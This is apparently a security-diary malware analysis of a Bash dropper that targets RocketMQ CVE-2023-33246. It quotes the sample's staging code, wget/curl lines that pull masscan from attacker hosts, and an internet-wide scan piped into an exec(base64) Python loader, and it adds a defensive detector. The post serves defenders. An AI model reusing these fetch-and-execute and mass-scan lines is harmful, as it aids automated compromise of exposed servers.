A few months ago, RocketMQ[1], a real-time message queue platform, suffered from a nasty vulnerability referred to as CVE-2023-33246. A few weeks ago, I found another malicious script in the wild that exploits this vulnerability. Today it still has a very low VirusTotal detection score: 2/60 [2] (SHA256: 70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5).
The script is a Bash script with two main parts. First, it prepares its environment by creating a working directory in the first writable location it finds:
    rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo '')
    if [ -z ${rand} ]; then
        rand='.tmp'
    fi
    echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; ${rm} -f "$(pwd)/.${rand}" >/dev/null 2>&1
    echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; ${rm} -f "/tmp/.${rand}" >/dev/null 2>&1
    echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; ${rm} -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
    echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; ${rm} -f "${HOME}/.${rand}" >/dev/null 2>&1
    mkdir -p ${LPATH} >/dev/null 2>&1
Then, it installs some dependencies using yum or apt. These allow the script to download and compile a copy of the masscan[3] port scanner on the fly:
    if [ ! -d ${LPATH}masscan ]; then
        echo "Downloading masscan.tar.gz.."
        wget -qO ${LPATH}masscan.tar.gz hxxp://149[.]28[.]85[.]17:80/wp-content/themes/twentyseventeen/masscan.tar.gz
        tar -C ${LPATH} -zxf ${LPATH}masscan.tar.gz
        rm ${LPATH}masscan.tar.gz
        make clean -C ${LPATH}masscan >/dev/null 2>&1
        make -C ${LPATH}masscan >/dev/null 2>&1
        masscan=${LPATH}masscan/bin/masscan
    elif [ -f ${LPATH}masscan/bin/masscan ]; then
        echo "Masscan existed already in ${LPATH}"
        masscan=${LPATH}masscan/bin/masscan
    else
        if [ ! -f ${LPATH}.masscan ]; then
            curl --retry 5 -sLk hxxp://203[.]55[.]135[.]12/wp-content/themes/twentyfifteen/masscan -o ${LPATH}.masscan
            chmod 755 ${LPATH}.masscan
            masscan=${LPATH}.masscan
        fi
        if [[ "" == "${masscan}" ]]; then
            exit
        fi
    fi
Masscan is very powerful: it can quickly scan the complete IPv4 address space for a specific port. That's exactly what the script does. It scans the Internet for the following open ports: 10911 and 10909, which are used by RocketMQ. The masscan results are passed to a Python script through a pipe:
    ${sudo} ${masscan} --shard 17/20 --rate 30000 --exclude-range 255.255.255.255 -p10911,10909 0.0.0.0/0 | python3 -c "import base64;exec(base64.b64decode('...redacted...'))"
The Python script has been redacted here but, for every IP reported by masscan, it starts a thread to try to exploit the server.
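As an added defensive example (my own code, not the author's and not taken from the sample), here is a small Python checker that flags a masscan command line sweeping the RocketMQ ports and piping its output into an exec(base64.b64decode(...)) one-liner, and that looks for masscan artifacts in the staging directories the dropper probes. The sample command lines are constructed, and STAGING_DIRS and the function names are my own assumptions.

```python
import os
import re
from pathlib import Path

# Ports the dropper's masscan sweep targets (RocketMQ listeners).
ROCKETMQ_PORTS = {"10911", "10909"}

# Staging locations the dropper probes (the current directory is added by the caller).
STAGING_DIRS = ["/tmp/.cache", "/usr/local/bin/.cache", os.path.expanduser("~/.cache")]
# Artifacts it leaves behind: a compiled tree or a prebuilt hidden binary.
STAGING_FILES = ["masscan/bin/masscan", ".masscan"]

def masscan_ports(cmdline: str) -> set:
    """Return the set of ports passed to masscan via -p on a command line."""
    m = re.search(r"masscan\b.*?\s-p\s*([\d,\-]+)", cmdline)
    return set(m.group(1).split(",")) if m else set()

def is_suspicious_cmdline(cmdline: str) -> bool:
    """True when a masscan sweep of RocketMQ ports feeds an exec(base64) Python one-liner."""
    hits_rocketmq = bool(masscan_ports(cmdline) & ROCKETMQ_PORTS)
    piped_to_exec = bool(re.search(r"\|\s*python3?\s+-c\s+.*exec\(base64\.b64decode\(", cmdline))
    return hits_rocketmq and piped_to_exec

def find_staged_masscan(dirs) -> list:
    """Return paths of masscan artifacts found under the given staging directories."""
    found = []
    for d in dirs:
        for rel in STAGING_FILES:
            p = Path(d) / rel
            if p.is_file():
                found.append(str(p))
    return found

# Constructed sample command lines (not from the sample) for a quick self-check.
SAMPLE_CMDLINES = [
    "/usr/bin/masscan --shard 17/20 --rate 30000 --exclude-range 255.255.255.255 "
    "-p10911,10909 0.0.0.0/0 | python3 -c \"import base64;exec(base64.b64decode('QUJD'))\"",
    "masscan -p80,443 10.0.0.0/8 --rate 1000",
    "python3 -c \"import base64;exec(base64.b64decode('QUJD'))\"",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(is_suspicious_cmdline(c), "|", c[:70])
    print(find_staged_masscan([os.path.join(os.getcwd(), ".cache")] + STAGING_DIRS))
```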
Something funny I found in the Python script: the attacker reused (or forked) existing code, because it also contains other exploits:
    remnux@remnux:/MalwareZoo/20231216$ grep module_ payload.py
        def ZZZZmodule_scan_bigip(self, ip, port):
        def ZZZZmodule_scan_webmin(self, ip, port):
        def module_scan_rocketmq(self, ip, port):
        def ZZZmodule_scan_wordpress(self, ip, port):
        def ZZZZmodule_scan_webuzo(self, ip, port):
The ones whose names start with "ZZZ" have been disabled.
[1] https://rocketmq.apache.org
[2] https://www.virustotal.com/gui/file/70710c630390dbf74a97162ab61aae78d3e18eacb41e16d3dd6bbd872fee66c5/detection
[3] https://github.com/robertdavidgraham/masscan
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key